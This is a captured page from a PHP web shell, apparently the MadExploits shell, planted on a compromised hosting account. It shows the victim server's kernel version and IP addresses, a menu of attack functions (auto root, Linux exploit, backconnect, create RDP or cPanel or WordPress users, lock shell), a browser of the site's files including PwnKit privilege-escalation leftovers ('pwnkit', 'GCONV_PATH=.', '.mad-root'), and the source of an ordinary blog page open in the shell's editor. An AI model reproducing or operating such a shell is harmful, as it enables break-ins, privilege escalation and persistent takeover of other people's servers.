Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.50.105
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : post.php
<?php include( "includes/header.php");?> <?php // $raw_id = htmlspecialchars(pg_escape_string($_GET['post_id'])); // $id = filter_var($raw_id, FILTER_SANITIZE_NUMBER_INT); // // if (checkPage($db, bt, $id)) { // $postId = $id; // }else { // $postId = 1; // } // // $post = getitem($db, bt, $postId); ?> <section class="page_breadcrumbs ds background_cover section_padding_50"> <div class="container"> <?php if(isset($_SESSION['login'])){ ?> <div class="row"> <div class="col-md-12 text-center"> <a href="create.php?type=blog" class="btn btn-success btn-lg"> <i class="fa fa-plus"></i> Add Post </a> <a href="update.php?tb=<?=$tool->ed(bt, 'e') ?>&ref=blog&type=blog&id=<?php echo $post[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> Edit Post </a> <a href="delete.php?type=blog&tbl=<?=$tool->ed(bt, 'e') ?>&id=<?php echo $post[0]; ?>&ref=blog" class="btn btn-danger btn-lg deleteServiceBtn" title="Delete This Content"> <i class="rt-icon2-trash"></i> Delete Post </a> </div> </div> <?php } ?> <div class="row"> <div class="col-sm-12 text-center"> <h2> <?=$post[1] ?></h2> <ol class="breadcrumb divided_content wide_divider"> <li> <a href="index.php"> Home </a> </li> <li > <a href="blog.php">Blog</li> </li> </ol> </div> </div> </div> </section> <section class="wht p-tb40"> <div class="container"> <div class="row"> <div class="col-sm-10 col-sm-push-1"> <div class="vertical-item content-padding with_shadow"> <div class="entry-thumbnail item-media"> <img src="<?=$post[3] ?>" alt="<?=$post[1] ?>"> </div> <div class="item-content"> <header class="entry-header"> <div class="entry-date small-text highlight"> <a href="single-blog.php" rel="bookmark"> <time class="entry-date" datetime="<?=$post[2] ?>" style="color:#ccc"> <i class="fa fa-clock-o"></i> <?=$tool->daysago($post[2]); ?> </time> </a> </div> <h1 class="entry-title"> <a href="single-blog.php" rel="bookmark"><?=$post[1] ?></a> </h1> <hr class="divider_30_1"> </header> <div class="entry-content"> <?=$post[4] ?> <?=$post[5] ?> </div> <hr class="divider_30_1"> <div class="entry-content"> <div id="disqus_thread"></div> </div> <!-- .entry-content --> <?php if(isset($_SESSION['login'])){ ?> <div class="row"> <div class="col-md-12 text-center"> <a href="create.php?type=blog" class="btn btn-success btn-lg" title="Create new blog post"> <i class="fa fa-plus"></i> Create New Post </a> <a href="update.php?tb=<?=$tool->ed(bt, 'e') ?>&ref=blog&type=blog&id=<?php echo $post[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> Edit This Post </a> <a href="delete.php?type=blog&tbl=<?=$tool->ed(bt, 'e') ?>&id=<?php echo $post[0]; ?>&ref=blog" class="btn btn-danger btn-lg deleteServiceBtn" title="Delete This Content"> <i class="rt-icon2-trash"></i> Delete Post </a> </div> </div> <?php }?> </div> </div> </div> </div> </div> </section> <?php include( "includes/subscribe.php");?> <!-- end section--> <?php include( "includes/footer.php");?>
Close